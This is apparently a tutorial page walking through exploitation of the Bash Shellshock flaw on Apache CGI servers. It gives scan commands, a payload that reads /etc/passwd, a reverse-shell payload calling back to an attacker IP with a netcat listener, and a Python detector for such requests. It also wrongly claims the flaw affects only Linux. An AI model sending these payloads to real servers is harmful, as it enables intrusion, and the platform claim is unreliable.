Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

CVE-2014-6271 - Shellshock

  • Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash shell (present since V1.3) that allow an attacker to execute arbitrary commands remotely via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.

  • The Shellshock vulnerability was discovered by Stéphane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.

  • Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.

  • The Shellshock vulnerability is caused by the way Bash imports function definitions from environment variables: when a variable's value begins with the character sequence () { :; };, Bash mistakenly executes whatever commands trail the function body instead of stopping at the closing brace.

  • This vulnerability only affects Linux, as Windows does not utilize Bash since it is not a *Nix based operating system.

  • In the context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are vulnerable to this attack.

  • CGI (Common Gateway Interface) scripts are used by Apache to execute programs (and therefore arbitrary commands) on the Linux system, after which the output is returned to the client.

Shellshock Exploitation

  • In order to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash.

  • In the context of an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server.

  • Whenever a CGI script is executed, the web server spawns a new process and runs the CGI script with Bash, passing the HTTP request headers (User-Agent, Referer, Cookie and so on) to it as environment variables, which is how attacker-controlled input reaches Bash.

  • This vulnerability can be exploited both manually and automatically with the use of an MSF exploit module.

Attack Flow for Exploiting Shellshock Vulnerability

1. Identify the Target

Objective: Verify if the target system is running an Apache server.

Tool: Nmap

Command:

nmap -sV <target_ip>

Explanation: This command scans the target IP to identify open ports and services. Look for Apache in the service list.

2. Find the CGI Script

Objective: Determine the path of the CGI script that runs on the server.

Action: Access the web application and examine the page source for the CGI script path.

Explanation: Look for a .cgi or .pl file in the source code. This is the script that you will target for the Shellshock exploit.

3. Check for Shellshock Vulnerability

Objective: Test if the CGI script is vulnerable to the Shellshock exploit.

Action: Use the Nmap script to check for Shellshock vulnerability.

nmap -sV <target_ip> --script=http-shellshock --script-args "http-shellshock.uri=<cgi_file_path>"

Explanation: This command uses the http-shellshock script to test the specified CGI script for the Shellshock vulnerability.

4. Set Up Burp Suite

Objective: Intercept and modify the HTTP request to exploit Shellshock.

Action: Configure Burp Suite to act as a proxy for your browser.

Explanation: This will allow you to capture and manipulate HTTP requests to the server.

5. Intercept the Request

Objective: Modify the HTTP request to include the Shellshock payload.

Action: Use Burp Suite’s Repeater tool to forward the captured request.

Payload for Checking Vulnerability:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Explanation: This payload checks if the server is vulnerable by attempting to execute a command that reads the /etc/passwd file. The two echo commands emit the blank line that terminates the HTTP response headers, so the command output appears in the response body.

6. Exploit Shellshock for Reverse Shell

Objective: Gain a reverse shell on the target server.

Action: Use the following payload to create a reverse shell.

Payload for Reverse Shell:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/<your_ip>/<your_port> 0>&1'

Explanation: This payload initiates a reverse shell connection from the target server to your machine.

7. Set Up a Listener

Objective: Prepare your system to receive the reverse shell connection.

Action: Run a Netcat listener on your machine.

nc -nvlp 1234

Explanation: This command listens for incoming connections on port 1234. Adjust the port number if needed.

8. Send the Exploit Request

Objective: Trigger the Shellshock exploit to establish the reverse shell.

Action: Send the modified HTTP request with the reverse shell payload through Burp Suite.

Explanation: Once sent, the target server will connect back to your Netcat listener, providing you with a reverse shell.
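The request pattern described in steps 5 to 8 is also what a defender looks for in web server logs or a WAF. The following added example (not part of the original notes, written here for illustration) parses constructed sample HTTP requests and flags any CGI-exported header whose value starts with the Bash function-definition prefix; the header list and the sample host 10.0.0.5 are assumptions for the demonstration.

```python
import re

# Shellshock probes begin a header value with a Bash function definition
# "() {" followed by trailing commands. Whitespace between the tokens is
# optional ("(){" is just as effective), so the match is deliberately loose;
# this is the same signature most IDS/WAF rules adopted after disclosure.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# A few of the request headers that Apache mod_cgi exports verbatim into the
# CGI environment (HTTP_USER_AGENT, HTTP_REFERER, ...), so their values reach
# Bash as environment variables. Assumed list for this example.
CGI_EXPORTED_HEADERS = ("user-agent", "referer", "cookie", "host", "accept")


def is_shellshock_attempt(header_value: str) -> bool:
    """True if the header value carries a Bash function-definition prefix."""
    return bool(SHELLSHOCK_RE.search(header_value))


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into a {lowercased-name: value} header map."""
    head = raw.split("\r\n\r\n", 1)[0]          # drop any body
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def flag_request(raw: str) -> list:
    """Names of CGI-exported headers in the request that carry the pattern."""
    headers = parse_request(raw)
    return [h for h in CGI_EXPORTED_HEADERS
            if h in headers and is_shellshock_attempt(headers[h])]


# Constructed sample requests: the probe from the notes above, a benign
# browser request (parentheses in a normal User-Agent must not trigger),
# and a compact variant delivered via Referer instead of User-Agent.
SAMPLES = {
    "probe": "GET /cgi-bin/status.cgi HTTP/1.1\r\nHost: 10.0.0.5\r\n"
             "User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'\r\n\r\n",
    "benign": "GET /cgi-bin/status.cgi HTTP/1.1\r\nHost: 10.0.0.5\r\n"
              "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0\r\n\r\n",
    "referer_probe": "GET /cgi-bin/status.cgi HTTP/1.1\r\nHost: 10.0.0.5\r\n"
                     "User-Agent: curl/8.0\r\nReferer: (){:;}; /usr/bin/id\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: flagged headers = {flag_request(raw)}")
```

Any hit on a request to a /cgi-bin/ path is worth an alert on its own; the complete fix remains updating Bash to a version that no longer imports functions from arbitrary environment variables.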

Worth Noting

It's worth noting that this vulnerability can also be exploited using the Metasploit framework. There are two modules available:

  1. auxiliary/scanner/http/apache_mod_cgi_bash_env: This module checks for the presence of CGI scripts and whether the server is vulnerable to the Shellshock exploit.

  2. exploit/multi/http/apache_mod_cgi_bash_env_exec: This module exploits the Shellshock vulnerability to gain a reverse shell using Meterpreter.




Hacker's Mantra: I really didn't understand why hackers would want to hack into a classroom. Are they going to learn algebra? Maybe calculus? - Eric Yuan


Last updated 11 months ago
